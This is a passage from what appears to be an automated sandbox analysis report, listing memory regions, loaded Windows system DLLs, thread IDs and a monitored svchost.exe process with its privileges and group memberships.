"private_0x0000000004780000" filename = "" Region: id = 510 start_va = 0x4790000 end_va = 0x4917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004790000" filename = "" Region: id = 511 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 512 start_va = 0x4920000 end_va = 0x4aa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004920000" filename = "" Region: id = 513 start_va = 0x4ab0000 end_va = 0x5eaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ab0000" filename = "" Region: id = 514 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 515 start_va = 0x4170000 end_va = 0x4170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004170000" filename = "" Region: id = 516 start_va = 0x4180000 end_va = 0x4184fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 517 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 518 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 519 start_va = 0x5eb0000 end_va = 0x61e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 520 start_va = 0x61f0000 end_va = 0x62d9fff monitored = 0 entry_point = 0x622d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 521 start_va = 0x46c0000 end_va = 0x46c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 522 start_va = 0x61f0000 end_va = 0x62cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 523 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 524 start_va = 0x46d0000 end_va = 0x46d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046d0000" filename = "" Region: id = 525 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 526 start_va = 0x46e0000 end_va = 0x46e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046e0000" filename = "" Region: id = 527 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 528 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 529 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 530 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 531 start_va = 0x46f0000 end_va = 0x472ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 532 start_va = 0x4730000 end_va = 0x476ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 533 start_va = 0x62d0000 end_va = 0x630ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062d0000" filename = "" Region: id = 534 start_va = 0x6310000 end_va = 0x634ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006310000" filename = "" Region: id = 535 start_va = 0x6350000 end_va = 0x638ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006350000" filename = "" Region: id = 536 start_va = 0x6390000 end_va = 0x63cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006390000" filename = "" Region: id = 537 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 1089 start_va = 0x6ca20000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6ca51e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 1098 start_va = 0x4770000 end_va = 0x4775fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004770000" filename = "" Thread: id = 13 os_tid = 0x9a8 Thread: id = 14 os_tid = 0x13f8 Thread: id = 15 os_tid = 0x364 Thread: id = 16 os_tid = 0x13fc Thread: id = 17 os_tid = 0x9b4 Thread: id = 18 os_tid = 0x8d8 Thread: id = 19 os_tid = 0x818 Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7496b000" os_pid = "0x3e8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c9f4" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 538 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 539 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 540 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 541 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 542 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 543 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 544 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 545 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 546 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 547 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 548 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 549 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 550 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 551 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 552 start_va = 0x420000 end_va = 0x421fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 553 start_va = 0x430000 end_va = 0x431fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 554 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 555 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 556 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 557 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 558 start_va = 0x570000 end_va = 0x576fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 559 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 560 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 561 start_va = 0x5a0000 end_va = 0x5a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 562 start_va = 0x5b0000 end_va = 0x5b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 563 start_va = 0x5c0000 end_va = 0x5c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 564 start_va = 0x5d0000 end_va = 0x5d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 565 start_va = 0x5e0000 end_va = 0x5e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 566 start_va = 0x5f0000 end_va = 0x5f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 567 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 568 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 569 start_va = 0x890000 end_va = 0x891fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 570 start_va = 0x8a0000 end_va = 0x8a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "newdev.dll.mui" filename = "\\Windows\\System32\\en-US\\newdev.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\newdev.dll.mui") Region: id = 571 start_va = 0x8b0000 end_va = 0x8b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 572 start_va = 0x8c0000 end_va = 0x8c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 573 start_va = 0x8d0000 end_va = 0x8d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 574 start_va = 0x8e0000 end_va = 0x8e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 575 start_va = 0x8f0000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 576 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 577 start_va = 0xa00000 end_va = 0xb80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 578 start_va = 0xb90000 end_va = 0xf8afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 579 start_va = 0xf90000 end_va = 0xfd4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 580 start_va = 0xfe0000 end_va = 0xfeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 581 start_va = 0xff0000 end_va = 0xff0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 582 start_va = 0x1000000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 583 start_va = 0x1100000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 584 start_va = 0x1180000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 585 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 586 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 587 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 588 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 589 start_va = 0x1600000 end_va = 0x1936fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 590 start_va = 0x1940000 end_va = 0x1a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 591 start_va = 0x1a40000 end_va = 0x1b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 592 start_va = 0x1b40000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 593 start_va = 0x1c40000 end_va = 0x1d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 594 start_va = 0x1d40000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 595 start_va = 0x1e40000 end_va = 0x1e82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 596 start_va = 0x1e90000 end_va = 0x1e96fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 597 start_va = 0x1ea0000 end_va = 0x1ea0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 598 start_va = 0x1eb0000 end_va = 0x1eb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 599 start_va = 0x1ec0000 end_va = 0x1ec1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 600 start_va = 0x1ed0000 end_va = 0x1ee7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 601 start_va = 0x1ef0000 end_va = 0x1ef3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 602 start_va = 0x1f00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 603 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 604 start_va = 0x2100000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 605 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 606 start_va = 0x2300000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 607 start_va = 0x2380000 end_va = 0x2380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 608 start_va = 0x2390000 end_va = 0x240ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 609 start_va = 0x2410000 end_va = 0x2411fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 610 start_va = 0x2420000 end_va = 0x2420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 611 start_va = 0x2430000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 612 start_va = 0x2440000 end_va = 0x2446fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 613 start_va = 0x2450000 end_va = 0x24cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 614 start_va = 0x24d0000 end_va = 0x24effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 615 start_va = 0x24f0000 end_va = 0x24f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 616 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 617 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 618 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 619 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 620 start_va = 0x2900000 end_va = 0x29dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 621 start_va = 0x29e0000 end_va = 0x2adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029e0000" filename = "" Region: id = 622 start_va = 0x2ae0000 end_va = 0x2b6dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 623 start_va = 0x2b70000 end_va = 0x2beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b70000" filename = "" Region: id = 624 start_va = 0x2bf0000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bf0000" filename = "" Region: id = 625 start_va = 0x2c00000 end_va = 0x2c0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c00000" filename = "" Region: id = 626 start_va = 0x2c10000 end_va = 0x2c1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c10000" filename = "" Region: id = 627 start_va = 0x2c20000 end_va = 0x2c2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c20000" filename = "" Region: id = 628 start_va = 0x2c30000 end_va = 0x2c3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c30000" filename = "" Region: id = 629 start_va = 0x2c40000 end_va = 0x2c4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c40000" filename = "" Region: id = 630 start_va = 0x2c50000 end_va = 0x2c51fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c50000" filename = "" Region: id = 631 start_va = 0x2c60000 end_va = 0x2cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c60000" filename = "" Region: id = 632 start_va = 0x2ce0000 end_va = 0x2ceffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 633 start_va = 0x2cf0000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 634 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 635 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 636 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 637 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 638 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 639 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 640 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 641 start_va = 0x3400000 end_va = 0x347ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 642 start_va = 0x3480000 end_va = 0x348ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 643 start_va = 0x3490000 end_va = 0x349ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003490000" filename = "" Region: id = 644 start_va = 0x34a0000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034a0000" filename = "" Region: id = 645 start_va = 0x34b0000 end_va = 0x34b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034b0000" filename = "" Region: id = 646 start_va = 0x34c0000 end_va = 0x34cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 647 start_va = 0x34d0000 end_va = 0x34dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 648 start_va = 0x34e0000 end_va = 0x34effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 649 start_va = 0x34f0000 end_va = 0x34f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034f0000" filename = "" Region: id = 650 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 651 start_va = 0x3600000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 652 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 653 start_va = 0x3800000 end_va = 0x387ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 654 start_va = 0x3880000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 655 start_va = 0x3900000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 656 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 657 start_va = 0x3b00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 658 start_va = 0x3c00000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 659 start_va = 0x3d00000 end_va = 0x3d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 660 start_va = 0x3d80000 end_va = 0x3d8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 661 start_va = 0x3d90000 end_va = 0x3d9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 662 start_va = 0x3da0000 end_va = 0x3da6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003da0000" filename = "" Region: id = 663 start_va = 0x3db0000 end_va = 0x3dfdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003db0000" filename = "" Region: id = 664 start_va = 0x3e00000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 665 start_va = 0x3f00000 end_va = 